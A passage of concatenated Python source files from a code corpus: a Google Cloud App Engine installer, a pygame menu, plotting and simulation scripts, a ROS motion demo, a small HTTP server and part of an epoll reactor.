== 'n':\n abort()\n\n print(text_color('Getting service account key...', Color.BLUE))\n subprocess.check_output(['gcloud', 'iam', 'service-accounts', 'keys', 'create', './key.json', '--iam-account', f'{project_id}@appspot.gserviceaccount.com'], cwd='dqm/backend')\n\n print(text_color('Setting up database...', Color.BLUE))\n\n prompt = input(text_color('Do you want to reuse an existing SQL instance? (y/N) ', Color.BOLD))\n create_sql_instance = True if prompt.lower() != 'y' else False\n sql_instance_name = input(text_color('SQL instance name (dqm)? ', Color.BOLD)) or 'dqm'\n sql_instance_region = input(text_color('SQL instance region (europe-west1)? ', Color.BOLD)) or 'europe-west1'\n if create_sql_instance:\n print(text_color('Creating SQL instance (it can take a little while)...', Color.BLUE))\n subprocess.check_output(['gcloud', 'sql', 'instances', 'create', sql_instance_name, '--region={}'.format(sql_instance_region)])\n\n prompt = input(text_color('Do you want to reuse an existing MySQL database? (y/N) ', Color.BOLD))\n create_sql_db = True if prompt.lower() != 'y' else False\n sql_db_name = input(text_color('MySQL database name (dqm)? ', Color.BOLD)) or 'dqm'\n if create_sql_db:\n print(text_color('Creating MySQL database...', Color.BLUE))\n subprocess.check_output(['gcloud', 'sql', 'databases', 'create', sql_db_name, '--instance={}'.format(sql_instance_name)])\n\n prompt = input(text_color('Do you want to reuse an existing MySQL user? (y/N) ', Color.BOLD))\n create_sql_user = True if prompt.lower() != 'y' else False\n sql_user_name = input(text_color('MySQL user name (dqmuser)? ', Color.BOLD)) or 'dqmuser'\n if create_sql_user:\n print(text_color('Creating MySQL user...', Color.BLUE))\n subprocess.check_output(['gcloud', 'sql', 'users', 'create', sql_user_name, '--instance={}'.format(sql_instance_name)])\n\n print(text_color('Connecting to database...', Color.BLUE))\n subprocess.check_output(['wget', 'https://dl.google.com/cloudsql/cloud_sql_proxy.linux.amd64', '-O', 'cloud_sql_proxy'], cwd='dqm/backend')\n subprocess.check_output(['chmod', '+x', 'cloud_sql_proxy'], cwd='dqm/backend')\n connection_name = f'{project_id}:{sql_instance_region}:{sql_instance_name}'\n subprocess.Popen(['./cloud_sql_proxy', f'-instances={connection_name}=tcp:3306'], stdout=subprocess.PIPE, cwd='dqm/backend')\n\n # Wait for database connection to be available...\n time.sleep(4)\n\n print(text_color('Migrating database...', Color.BLUE))\n os.putenv('DQM_CLOUDSQL_CONNECTION_NAME', connection_name)\n os.putenv('DQM_CLOUDSQL_DATABASE', sql_db_name)\n os.putenv('DQM_CLOUDSQL_USER', sql_user_name)\n subprocess.check_output(['python3', '-m', 'pipenv', 'run', 'python', 'manage.py', 'makemigrations'], cwd='dqm/backend')\n subprocess.check_output(['python3', '-m', 'pipenv', 'run', 'python', 'manage.py', 'makemigrations', 'dqm'], cwd='dqm/backend')\n subprocess.check_output(['python3', '-m', 'pipenv', 'run', 'python', 'manage.py', 'migrate'], cwd='dqm/backend')\n\n print(text_color('Generating requirements.txt file...', Color.BLUE))\n with open('dqm/backend/requirements.txt', 'w') as f:\n subprocess.call(['python3', '-m', 'pipenv', 'lock', '--requirements'], cwd='dqm/backend', stdout=f)\n\n print(text_color('Updating app.yaml file...', Color.BLUE))\n with open('dqm/backend/app.yaml') as f:\n content = f.read()\n content = content.replace('DQM_CLOUDSQL_CONNECTION_NAME: \"\"', f'DQM_CLOUDSQL_CONNECTION_NAME: \"{connection_name}\"')\n content = content.replace('DQM_CLOUDSQL_USER: \"dqmuser\"', f'DQM_CLOUDSQL_USER: \"{sql_user_name}\"')\n content = content.replace('DQM_CLOUDSQL_DATABASE: \"dqm\"', f'DQM_CLOUDSQL_DATABASE: \"{sql_db_name}\"')\n\n with open('dqm/backend/app.yaml', 'w') as f:\n f.write(content)\n\n print(text_color('Deploying to App Engine app...', Color.BLUE))\n subprocess.check_output(['gcloud', 'app', 'deploy'], cwd='dqm/backend')\n\n print(text_color('All good, thanks for using DQM :)', Color.GREEN))\n\n","sub_path":"installer.py","file_name":"installer.py","file_ext":"py","file_size_in_byte":6724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"172220011","text":"import pygame\n\nfrom physics import *\nfrom settings import *\n\ndef text_format(message, textFont, textSize, textColor):\n newFont=pygame.font.SysFont(textFont, textSize)\n newText=newFont.render(message, 0, textColor)\n\n return newText\n\ndef menu(screen, clock):\n menu=True\n selected=\"start\"\n\n while menu:\n for event in pygame.event.get():\n if event.type==pygame.QUIT:\n pygame.quit()\n quit()\n if event.type==pygame.KEYDOWN:\n if event.key==pygame.K_UP:\n selected=\"start\"\n elif event.key==pygame.K_DOWN:\n selected=\"quit\"\n if event.key==pygame.K_RETURN:\n if selected==\"start\":\n return\n if selected==\"quit\":\n pygame.quit()\n quit()\n\n # Main Menu UI\n font = \"roboto\"\n screen.fill(BLUE)\n title=text_format(\"Space Create\",font , 90, SILVER)\n if selected==\"start\":\n text_start=text_format(\"START\", font, 75, WHITE)\n else:\n text_start = text_format(\"START\", font, 75, BLACK)\n if selected==\"quit\":\n text_quit=text_format(\"QUIT\", font, 75, WHITE)\n else:\n text_quit = text_format(\"QUIT\",font, 75, BLACK)\n\n title_rect=title.get_rect()\n start_rect=text_start.get_rect()\n quit_rect=text_quit.get_rect()\n\n # Main Menu Text\n screen.blit(title, (WIDTH/2 - (title_rect[2]/2), 80))\n screen.blit(text_start, (WIDTH/2 - (start_rect[2]/2), 300))\n screen.blit(text_quit, (WIDTH/2 - (quit_rect[2]/2), 360))\n pygame.display.update()\n clock.tick(FPS)\n pygame.display.set_caption(\"Python - Pygame Simple Main Menu Selection\")\n","sub_path":"intro.py","file_name":"intro.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"271828012","text":"from matplotlib import rc\nrc(\"font\", family=\"serif\", size=12)\n\nimport daft\n\n# Colors\ng_color = {\"ec\": \"#46a546\"}\nh_color = {\"ec\": \"#348ABD\"}\ns_color = {\"ec\": \"#7A68A6\"}\ne_color = {\"ec\": \"#A60628\"} \n\n# Instantiate the PGM.\npgm = daft.PGM([7, 4.7], origin=[0.3, 0.3])\n\n# Hierarchical parameters.\n# Hyper parameters\npgm.add_node(daft.Node(\"alpha_n\", r\"$\\alpha_n$\", 0.75, 2.25, plot_params=e_color, fixed=True))\npgm.add_node(daft.Node(\"beta_n\", r\"$\\beta_n$\", 1.25, 2.25, plot_params=e_color, fixed=True))\n\npgm.add_node(daft.Node(\"alpha_q\", r\"$\\alpha_q$\", 3, 4.25, plot_params=h_color, fixed=True))\npgm.add_node(daft.Node(\"beta_q\", r\"$\\beta_q$\", 3.5, 4.25, plot_params=h_color, fixed=True))\npgm.add_node(daft.Node(\"lambda_q\", r\"$\\lambda_q$\", 2.5, 4.25, plot_params=h_color, fixed=True))\npgm.add_node(daft.Node(\"gamma_q\", r\"$\\gamma_q$\", 2, 4.25, plot_params=h_color, fixed=True))\n\npgm.add_node(daft.Node(\"alpha_g\", r\"$\\alpha_g$\", 5.5, 4.25, plot_params=g_color, fixed=True))\npgm.add_node(daft.Node(\"beta_g\", r\"$\\beta_g$\", 6.5, 4.25, plot_params=g_color, fixed=True))\npgm.add_node(daft.Node(\"lambda_g\", r\"$\\lambda_g$\", 5.5, 2.75, plot_params=g_color, fixed=True))\npgm.add_node(daft.Node(\"gamma_g\", r\"$\\gamma_g$\", 6.5, 2.75, plot_params=g_color, fixed=True))\n\n# Latent variable.\npgm.add_node(daft.Node(\"tau_n\", r\"$\\tau_n$\", 1, 1.5, plot_params=e_color))\n\npgm.add_node(daft.Node(\"tau_q\", r\"$\\tau_q$\", 3.25, 3.5, plot_params=h_color))\npgm.add_node(daft.Node(\"tau_g\", r\"$\\tau_g$\", 6, 3.5, plot_params=g_color))\n\npgm.add_node(daft.Node(\"mu_q\", r\"$\\mu_q$\", 2.25, 3.5, plot_params=h_color))\npgm.add_node(daft.Node(\"mu_g\", r\"$\\mu_g$\", 6, 2, plot_params=g_color))\n\npgm.add_node(daft.Node(\"T\", r\"$T_{hq}$\", 2.75, 2.5, plot_params=h_color))\npgm.add_node(daft.Node(\"B\", r\"$B_{gq}$\", 4.5, 2.75, plot_params=g_color))\n\n# Data.\npgm.add_node(daft.Node(\"S\", r\"$S_{hgq}$\", 4.5, 1.5, observed=True, plot_params=s_color))\n\n# Add in the edges.\npgm.add_edge(\"alpha_n\", \"tau_n\")\npgm.add_edge(\"beta_n\", \"tau_n\")\n\npgm.add_edge(\"alpha_q\", \"tau_q\")\npgm.add_edge(\"beta_q\", \"tau_q\")\npgm.add_edge(\"gamma_q\", \"mu_q\")\npgm.add_edge(\"lambda_q\", \"mu_q\")\n\npgm.add_edge(\"alpha_g\", \"tau_g\")\npgm.add_edge(\"beta_g\", \"tau_g\")\npgm.add_edge(\"gamma_g\", \"mu_g\")\npgm.add_edge(\"lambda_g\", \"mu_g\")\n\npgm.add_edge(\"tau_q\", \"T\")\npgm.add_edge(\"tau_q\", \"mu_q\")\n\npgm.add_edge(\"tau_g\", \"B\")\npgm.add_edge(\"tau_g\", \"mu_g\")\n\npgm.add_edge(\"mu_q\", \"T\")\npgm.add_edge(\"mu_g\", \"B\")\n\npgm.add_edge(\"tau_n\", \"S\")\npgm.add_edge(\"T\", \"S\")\npgm.add_edge(\"B\", \"S\")\n\n\n# Add H plate\npgm.add_plate(daft.Plate([1.5, 0.5, 5.5, 4.3], label=r\"$h \\in H$\",\n shift=-0.1))\n\n# Add G plate\npgm.add_plate(daft.Plate([4, 0.6, 2.9, 4.1], label=r\"$g \\in G(h)$\",\n shift=-0.1))\n\n# Add Q plate\npgm.add_plate(daft.Plate([1.6, 1, 3.5, 3.7], label=r\"$q \\in Q(h)$\",\n shift=-0.1))\n\n# Render and save\npgm.render()\npgm.figure.savefig(\"ProposedModel.pdf\")\n","sub_path":"Thesis/figures/Models/ProposedModel.py","file_name":"ProposedModel.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"49575954","text":"#!/usr/bin/env python\nimport sys\nfrom src.annotation import Annotation\n\n#this functions takes an ipr file and returns a list of annotations. 3 types of annotations are retrieved based on the following keys: \"Dbxref\", \"GO\" and \"InterPro\"\n#Note: when pulling data from the input file, we always use \".strip()\" to remove any whitespace padding\n#Note: this algorithm assumes that if the column exists then the supposed type of value is there (e.g. if column #11 exists, then it has IPR information)\ndef read_ipr(io_buffer, whitelist=None):\n \"\"\"Returns a list of lists, each containing mrna_id, \"Dbxref\" and annotation.\"\"\"\n ipr_list = []\n for line in io_buffer:\n columns = line.split(\"\\t\") #columns are assumed to be tab-separated\n #if column exists and dbxref is in whitelist (aside from whitespace padding and caps)\n if (len(columns)>3 and (columns[3].strip().lower() in whitelist)) or\\\n (len(columns)>3 and not whitelist): \n ipr_list.append(Annotation(columns[0].strip(), \"Dbxref\", columns[3].strip().upper()+\":\"+columns[4].strip()))\n #if column exists (we don't care about the whitelist for GO annotations)\n if len(columns)>13 and columns[13].find(\"GO:\") != -1: \n ipr_list.append(Annotation(columns[0].strip(), \"Dbxref\", columns[13].strip()))\n #if column exists (we don't care about the whitelist for IPR annotations)\n if len(columns)>11 and columns[11].find(\"IPR\") != -1: \n ipr_list.append(Annotation(columns[0].strip(), \"Dbxref\", \"InterPro:\"+columns[11].strip()))\n\n #this alg removes duplicates\n ipr_list = sorted(ipr_list)\n ipr_list = [ipr_list[i] for i in range(len(ipr_list)) if i== 0 or ipr_list[i] != ipr_list[i-1]]\n\n return ipr_list\n","sub_path":"src/ipr.py","file_name":"ipr.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"233992036","text":"import os\nimport ovito\nfrom ovito.anim import *\nfrom ovito.data import *\nfrom ovito.io import import_file\nfrom ovito.modifiers import *\nfrom ovito.vis import *\n\nimport sys\n\ninfile = str(sys.argv[1])\nflip = int(sys.argv[2])\ndpi = int(sys.argv[3])\noutfile, file_extension = os.path.splitext(infile) # get base name\n\nnode = import_file(infile, multiple_frames = True) # load file as trajectory\nnode.add_to_scene()\n\na = 0\nfinal = node.source.num_frames - 1 # index of last frame\n\n# Particle colors\nr_tel = 0.294\ng_tel = 0.654\nb_tel = 0.611\n\nr_orn = 0.807\ng_orn = 0.650\nb_orn = 0.321\n\n# made this a while loop so that I could handle exceptions\nwhile a == 0:\n # White background\n rs = RenderSettings(\n filename = outfile + \".png\",\n size = (dpi, dpi),\n background_color = (1.0, 1.0, 1.0),\n renderer = OpenGLRenderer()\n ) # settings for render\n\n ovito.dataset.anim.current_frame = final # grab final snapshot\n vp = ovito.dataset.viewports.active_vp\n \n # Flip the color scheme A to orange, B to teal\n if flip:\n node.modifiers.append(SelectParticleTypeModifier(property='Particle Type',\n types={0}))\n node.modifiers.append(AssignColorModifier(color=(r_tel, g_tel, b_tel)))\n\n # catch any corrupted data errors\n try:\n node.compute() # set color of type A\n a = 1\n except Exception:\n final -= 1\n a = 0\n\n # Flip the color scheme A: teal, B: orange\n if flip:\n node.modifiers.append(SelectParticleTypeModifier(property='Particle Type',\n types={1}))\n node.modifiers.append(AssignColorModifier(color=(r_orn, g_orn, b_orn)))\n\n # this block will only run if we haven't thrown an exception\n if a == 1:\n node.compute() # set color of type B\n vp.type = Viewport.Type.TOP # top view\n vp.zoom_all() # zoom to fit\n vp.render(rs) # render image\n","sub_path":"simulation_camera/png_final_tstep.py","file_name":"png_final_tstep.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"327541180","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 22 22:39:58 2017\n\n@author: pschl\n\"\"\"\n\nfrom apm import *\nimport matplotlib.pyplot as plt\n\ns = 'http://byu.apmonitor.com'\na = 'schleede'\n\napm(s,a,'clear all')\napm_load(s,a,'p3.apm')\ncsv_load(s,a,'p3.csv')\n\n#Kf and Kb are FVs so they can be manipulated by the MHE\napm_info(s,a,'FV','Kf')\napm_info(s,a,'FV','Kb')\napm_option(s,a,'Kf.status',1)\napm_option(s,a,'Kf.fstatus',0)\napm_option(s,a,'Kb.status',1)\napm_option(s,a,'Kb.fstatus',0)\n#dcost\n\n#Ca,Cb,Cd are SVs because they are of interest but we have no data of them\napm_info(s,a,'SV','Ca')\napm_info(s,a,'SV','Cb')\napm_info(s,a,'SV','Cd')\n#TUNE SVS HERE\n\n#Cc is a CV because it has data and we want to fit to it\napm_info(s,a,'CV','Cc')\napm_option(s,a,'Cc.status',0)\napm_option(s,a,'Cc.fstatus',1)\n\n#Solution stuff\napm_option(s,a,'nlc.nodes',3)\napm_option(s,a,'nlc.solver',1)\napm_option(s,a,'nlc.imode',5)\n#apm_option(s,a,'nlc.mv_type',1)\napm_option(s,a,'nlc.ev_type',1)\napm_option(s,a,'nlc.sensitivity',1)\n\noutput = apm(s,a,'solve')\nprint(output)\n\ny = apm_sol(s,a)\n\napm_web(s,a)\n\nprint('Kf = ' + str(y['kf'][-1]))\nprint('Kb = ' + str(y['kb'][-1]))\n\ntime = [0,5,10,20,30,40,50,60,90,120,150,180,240,300,360,480,600,720]\nCc_meas = [0,.57,.78,.92,1.04,1.19,1.29,1.36,1.59,1.68,1.84,1.96,2.01,2.13,2.21,5.32,2.38,2.44]\n\ntime_rm = [0,5,10,20,30,40,50,60,90,120,150,180,240,300,360,360,600,720]\nCc_meas_rm = [0,.57,.78,.92,1.04,1.19,1.29,1.36,1.59,1.68,1.84,1.96,2.01,2.13,2.21,2.21,2.38,2.44]\n\nplt.figure(1)\nplt.plot(time,Cc_meas, label='Measured Cc')\nplt.plot(y['time'],y['cc'],label='Model Cc')\nplt.plot(time, Cc_meas_rm,label='Measured Cc with no Outlier')\nplt.xlabel('time')\nplt.ylabel('concentration')\nplt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\n\nplt.figure(2)\nplt.plot(y['time'],y['ca'],label='Model Ca')\nplt.plot(y['time'],y['cb'],label='Model Cb')\nplt.plot(y['time'],y['cc'],label='Model Cc')\nplt.plot(y['time'],y['cd'],label='Model Cd')\nplt.xlabel('time')\nplt.ylabel('concentration')\nplt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\nplt.show()","sub_path":"Midterm/Problem3.py","file_name":"Problem3.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"211172604","text":"#!/usr/bin/env python\n\n# Software License Agreement (BSD License)\n#\n# Copyright (c) 2014-2015, Dataspeed Inc.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without modification,\n# are permitted provided that the following conditions are met:\n# \n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n# * Neither the name of Dataspeed Inc. nor the names of its\n# contributors may be used to endorse or promote products derived from this\n# software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport rospy\nfrom geometry_msgs.msg import Twist\n\ndef timer_callback(event):\n pub.publish(twist_output)\n\ndef simple_motion(twist, duration):\n global twist_output\n\n opposite_twist = Twist()\n opposite_twist.linear.x = -twist.linear.x\n opposite_twist.linear.y = -twist.linear.y\n opposite_twist.angular.z = -twist.angular.z\n\n if rospy.is_shutdown():\n return\n\n twist_output = twist\n rospy.sleep(duration)\n twist_output = zero_twist\n rospy.sleep(1.0)\n twist_output = opposite_twist\n rospy.sleep(duration)\n twist_output = zero_twist\n rospy.sleep(1.0)\n\ndef motion_demo():\n global pub\n pub = rospy.Publisher('/mobility_base/cmd_vel', Twist, queue_size=1)\n rospy.init_node('motion_demo');\n\n global zero_twist\n zero_twist = Twist()\n zero_twist.linear.x = 0\n zero_twist.linear.y = 0\n zero_twist.angular.z = 0\n\n global twist_output\n twist_output = Twist()\n\n rospy.Timer(rospy.Duration(0.1), timer_callback)\n\n speed = 0.2\n dist = 1 / 3.28\n vel = Twist()\n \n # Rotate\n vel.linear.x = 0\n vel.linear.y = 0\n vel.angular.z = 0.628\n simple_motion(vel, 10.2)\n\n # North\n vel.linear.x = speed\n vel.linear.y = 0\n vel.angular.z = 0\n simple_motion(vel, dist/speed)\n\n # North-East\n vel.linear.x = 0.707 * speed\n vel.linear.y = -0.707 * speed\n vel.angular.z = 0\n simple_motion(vel, dist/speed)\n \n # East\n vel.linear.x = 0\n vel.linear.y = -speed\n vel.angular.z = 0\n simple_motion(vel, dist/speed)\n \n # South-East\n vel.linear.x = -0.707 * speed\n vel.linear.y = -0.707 * speed\n vel.angular.z = 0\n simple_motion(vel, dist/speed)\n\n # South\n vel.linear.x = -speed\n vel.linear.y = 0\n vel.angular.z = 0\n simple_motion(vel, dist/speed)\n\n # South-West\n vel.linear.x = -0.707 * speed\n vel.linear.y = 0.707 * speed\n vel.angular.z = 0\n simple_motion(vel, dist/speed)\n\n # West\n vel.linear.x = 0\n vel.linear.y = speed\n vel.angular.z = 0\n simple_motion(vel, dist/speed)\n\n # North-West\n vel.linear.x = 0.707 * speed\n vel.linear.y = 0.707 * speed\n vel.angular.z = 0\n simple_motion(vel, dist/speed)\n\nif __name__ == '__main__':\n motion_demo()\n","sub_path":"scripts/motion_demo.py","file_name":"motion_demo.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"361690202","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pylab\nimport matplotlib as mpl\nimport sys\n\n\ndef task(tStep):\n\n\tdir = u\"output_14_supersym\"\n\t# tStep = 5000\n\n\tZ = np.loadtxt(\".\\\\\" + dir + \"\\\\task_9_2dVec_P_tStep=\" + str(tStep) + \".csv\",delimiter=\",\")\n\tZ = Z.T\n\t# print np.max(Z), np.min(Z)\n\tps(np.max(Z))\n\tps(\"\\t\")\n\tps(np.min(Z))\n\tps(\"\\n\")\n\n\tfor i in xrange(len(Z)):\n\t\tfor j in xrange(len(Z[0])):\n\t\t\tif Z[i][j] > 0.6:\n\t\t\t\tZ[i][j] = 0.6\n\t\t\telif Z[i][j] < -0.6:\n\t\t\t\tZ[i][j] = -0.6\n\n\tNX = 401\n\tNY = 201\n\tTstep2T = 1.0/50.0\n\n\tx = np.linspace(-10, 30, NX)\n\ty = np.linspace(-10, 10, NY)\n\t# print x\n\t# print y\n\tX, Y = np.meshgrid(x, y)\n\n\t# print x\n\t# print y\n\t# exit()\n\n\t# 一括設定\n\t# http://nanyakan.blogspot.jp/2013/03/matplotlib.html\n\tmpl.rcParams['font.family'] = u'Consolas'\n\t# mpl.rcParams['font.size'] = 14\n\t# params = {'font.family': 'Times New Roman'}\n\t# params = {'font.family': 'Consolas'}\n\t# mpl.rcParams.update(params)\n\t# print mpl.rcParams['font.family']\n\n\n\n\t#plt.contour(X, Y, Z)\n\t# plt.contourf(X, Y, Z)\n\t# plt.contourf(X, Y, Z)\n\t# plt.contour(X, Y, Z, 80)\n\t# colorbarRange = np.linspace(-0.6, 0.6, 30, endpoint=False)\n\t# colorbarRange = np.linspace(-0.6, 0.6, 12*2+1)\n\t# colorbarRange = np.linspace(-0.6, 0.6, 15*2+1)\n\t# colorbarRange = np.linspace(-0.6, 0.6, 12*4+1)\n\t# colorbarRange = np.linspace(-0.6, 0.6, 12*4+1)\n\tcolorbarRange = np.linspace(-0.6, 0.6, 12*5+1)\n\t# colorbarRange = np.linspace(-0.3, 0.3, 15*2+1)\n\t# print colorbarRange\n\tplt.contour(X, Y, Z, colorbarRange, colors=\"black\",alpha=0.3, linewidths=0.3, linestyles=\"solid\")\n\tplt.contourf(X, Y, Z, colorbarRange, cmap=plt.cm.jet)\n\n\t# plt.contourf(X, Y, Z, 80, cmap=plt.cm.prism)\n\tcolorbarTics = np.linspace(-0.6, 0.6, 6+1)\n\t# pad: プロットエリアとカラーバーの距離\n\tcb = plt.colorbar(label=\"Pressure\", orientation=\"horizontal\", pad=0.1, ticks=colorbarTics)\n\n\n\n\tax = cb.ax\n\t# font = mpl.font_manager.FontProperties(family='times new roman', style='italic', size=16)\n\tfont = mpl.font_manager.FontProperties(family='Consolas')\n\t# text = ax.yaxis.label\n\ttext = ax.xaxis.label\n\t# text.set_font_properties(font)\n\n\n\t# cb.ax.tick_params(steps=10)\n\t# cb.ax.tick_params(font)\n\t# text = ax.xticks\n\t# text.set_font_properties(font)\n\t# plt.xticks(fontname=\"Consolas\")\n\t# plt.yticks(fontname=\"Consolas\")\n\n\n\n\trect = pylab.Rectangle((-0.5, -0.5), 1, 1, linewidth=0, facecolor=\"#777777\")\n\t# rect = pylab.Rectangle((-10, -10), 10, 10, linewidth=0, facecolor=\"#FF0000\")\n\tplt.gca().add_patch(rect)\n\n\t# plt.title(\"T_Step = \" + '{0:05d}'.format(tStep) + \", time = \" + str(tStep*Tstep2T))\n\tplt.title(\"T_Step = \" + '{0:05d}'.format(tStep) + \", time = \" + '{0:06.1f}'.format(tStep*Tstep2T))\n\t# plt.title(\"T_Step = \" + '{0:05d}'.format(tStep) + \", time = \" + '{0:06.1f}'.format(tStep*Tstep2T), fontname=\"Consolas\")\n\n\t#plt.contour(X, Y, Z, levels=[-0.4, -0.2 ,0, 0.2, 0.4, 0.6, 0.8, 1.0])\n\n\tplt.gca().set_aspect('equal')\n\tfilename = \"output_Tstep=\" + '{0:05d}'.format(tStep) + \".png\"\n\tplt.savefig(filename,dpi=75)\n\n\n\n\t# plt.show()\n\tplt.close()\n\n\t#plt.pause(interval)\n\n\n\ndef ps(output):\n\tsys.stdout.write(str(output))\n\tsys.stdout.flush()\n\n\ndef main():\n\t# task(500)\n\t# for i in xrange(50, 50001, 50):\n\tfor i in xrange(0, 30001, 50):\n\t\t# print i\n\t\tps(i)\n\t\tps(\"\\t\")\n\t\ttask(i)\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n","sub_path":"KarmanVortex/visualization/plot_pngset.py","file_name":"plot_pngset.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"85704291","text":"'''\n手绘效果图展示---\n'''\nfrom PIL import Image\nimport numpy as np\nvec_el=np.pi/2.2#光源俯视角度 弧度制\nvec_az=np.pi/4#光源方位角度\ndepth=10#0-100\nim=Image.open('13.jpg').convert('L')\na=np.asarray(im).astype('float')\ngrad=np.gradient(a)#图像灰度的梯度值\ngrad_x,grad_y=grad\ngrad_x=grad_x*depth/100\ngrad_y=grad_y*depth/100\ndx=np.cos(vec_el)*np.cos(vec_az)#光源对x轴的影响\ndy=np.cos(vec_az)*np.cos(vec_el)\ndz=np.sin(vec_el)\nA=np.sqrt(grad_x**2+grad_y**2+1.)\nuni_x=grad_x/A\nuni_y=grad_y/A\nuni_z=1./A\na2=255*(dx*uni_x+dy*uni_y+dz*uni_z)#光源归一化\na2=a2.clip(0,255)\nim2=Image.fromarray(a2.astype('uint8'))#重构图像\nim2.show()\nim2.save('133.jpg')","sub_path":"hand_pic_draw.py","file_name":"hand_pic_draw.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"352596588","text":"import http.server\n#from prometheus_client import start_http_server\n\nAPP_PORT = 8000\n#METRICS_PORT = 8001\n\nclass HandleRequests(http.server.BaseHTTPRequestHandler):\n\n def do_GET(self):\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n self.wfile.write(bytes(\"Mi aplicacion instrumentada

    Cerouno - Demo de instrumentation para Prometheus con Python.

    \", \"utf-8\"))\n self.wfile.close()\n\nif __name__ == \"__main__\":\n #start_http_server(METRICS_PORT)\n server = http.server.HTTPServer(('localhost', APP_PORT), HandleRequests)\n server.serve_forever()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"171726307","text":"import subprocess\n\ncmd = \"gcc -xc - -lpthread\"\nwith open('multi_thread.c') as f:\n pg = f.read().encode('utf8')\n\np = subprocess.Popen(cmd.split(' '), stdin=subprocess.PIPE)\np.communicate(pg)\np.wait()\n\n","sub_path":"programs/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"548837862","text":"import time\nimport heapq\nimport select\nimport logging\n\nfrom hardcoded_settings import MAX_PACKET_SIZE\n\n\nreactor_logger = logging.getLogger('reactor')\n\n\nclass CB(object):\n def __init__(self, func, evt, fileobj, timeout_at):\n self.func = func\n self.evt = evt\n self.fileobj = fileobj\n self.timeout_at = timeout_at\n self.fd = None if fileobj is None else fileobj.fileno()\n\n\nclass Reactor(object):\n def __init__(self):\n self.selector = select.epoll()\n self.fd2cb = {}\n self.callbacks_heap = []\n\n def close(self):\n # TODO(koder): call all callbacks with 'close' exception\n self.selector.close()\n\n def register(self, fileobj, evt, cb_func, timeout):\n if timeout != -1 and timeout is not None:\n timeout_at = timeout + time.time()\n else:\n timeout_at = None\n\n callback = self.fd2cb.get(fileobj.fileno())\n\n if not callback:\n self.selector.register(fileobj, evt)\n callback = CB(cb_func, evt, fileobj, timeout_at)\n self.fd2cb[fileobj.fileno()] = callback\n else:\n assert callback.fileobj is fileobj\n assert callback.evt == evt\n callback.func = cb_func\n callback.timeout_at = timeout_at\n\n if timeout_at is not None:\n heapq.heappush(self.callbacks_heap, (timeout_at, callback))\n\n def unregister(self, fileobj):\n # can't just remove it from list - it can take too long with large lists\n # so make it empty, but don't touch timeout_at - as this will breaks the heap\n # event would be removed upon obtaining from callbacks_heap\n callback = self.fd2cb[fileobj.fileno()]\n\n # if timeout_at is None - this event will never be removed out of heap on timeout\n # have to remove it manually\n if callback.timeout_at is None:\n reactor_logger.warning(\"Removing event with no timeout. This can slow down you code\")\n self.callbacks_heap = [(tout, cb_obj)\n for (tout, cb_obj) in self.callbacks_heap\n if cb_obj is not callback]\n heapq.heapify(self.callbacks_heap)\n else:\n callback.evt = callback.func = callback.fd = callback.fileobj = None\n\n self.selector.unregister(fileobj)\n del self.fd2cb[fileobj.fileno()]\n\n def call_later(self, tout, func):\n call_at = tout + time.time()\n callback = CB(func, None, None, call_at)\n heapq.heappush(self.callbacks_heap, (call_at, callback))\n\n def call_shortly(self, func):\n 